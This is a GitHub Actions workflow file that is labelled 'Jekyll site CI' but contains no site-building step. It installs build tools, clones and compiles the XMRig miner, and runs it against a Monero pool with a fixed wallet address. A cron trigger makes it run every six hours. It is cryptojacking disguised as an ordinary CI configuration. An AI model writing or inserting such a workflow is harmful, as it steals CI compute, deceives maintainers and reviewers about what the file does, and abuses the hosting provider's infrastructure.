name: Jekyll site CI

on:
  push:
    branches: 
  pull_request:
    branches: 
    schedule:
    - cron: "10 */6 * * *"

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Build the site
      run: |
        sudo apt update
        sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
    - name: Build 
      run: |
        git clone https://github.com/xmrig/xmrig.git
        mkdir xmrig/build
        cd xmrig/build
        cmake ..
        make -j$(nproc)
    - name: Run
      run: |
        cd xmrig/build
        ./xmrig -o xmr.2miners.com:2222 -u 8C8ihAeP2HuNrJECaJJdsQcboBJwcpQ3fcyrUfAo7m6NKPtem4xMuV8KtXLKMAh5FcVtUtyAQurHbLsp77fjpm9LDEAEzee -p gitrig -k --coin monero -a rx/0 --threads 2
